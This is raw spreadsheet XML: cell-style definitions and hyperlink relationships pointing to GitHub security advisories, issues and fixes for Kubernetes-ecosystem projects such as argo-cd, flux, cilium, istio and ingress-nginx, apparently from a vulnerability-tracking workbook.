    <xf numFmtId="0" fontId="1" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0"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14" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="1" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="4"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23" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="1" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="1" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="1" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="1" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="1" xfId="6" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="4" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3"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2" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35"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14" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0"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ithub.com/kubevirt/kubevirt/pull/8198&#10;" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/issues/10572" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131005" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131007" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131008" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131006" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131009" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126813" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-5q86-62xr-3r57" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126744" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cert-manager/cert-manager/pull/7400" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cert-manager/cert-manager/security/advisories/GHSA-r4pg-vg54-wxx4" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bugzilla.redhat.com/show_bug.cgi?id=1848951" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126812" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/helm-controller/commit/3cd330cc537216d86021675d9ff701bb3d98f1fb#diff-636b2d9b8556d090f81ebb29cd952f88428684befccf637cd1022e060fb45b91" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/issues/6441" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/issues/12309" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/pull/41705" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/pull/35577/commits/1418327b19fddea6ae6c81aea0bcc172367cd845#diff-1c9bc88a1372a2e7d3e61cee951979d630349bfd3181199c6bb3a9f270f4da21" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubevirt/kubevirt/pull/3686" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126811"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github.com/kubevirt/kubevirt/pull/8198&#10;" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/issues/10572" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/126813" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131005" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131007" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131008" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kubernetes/kubernetes/issues/131006" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 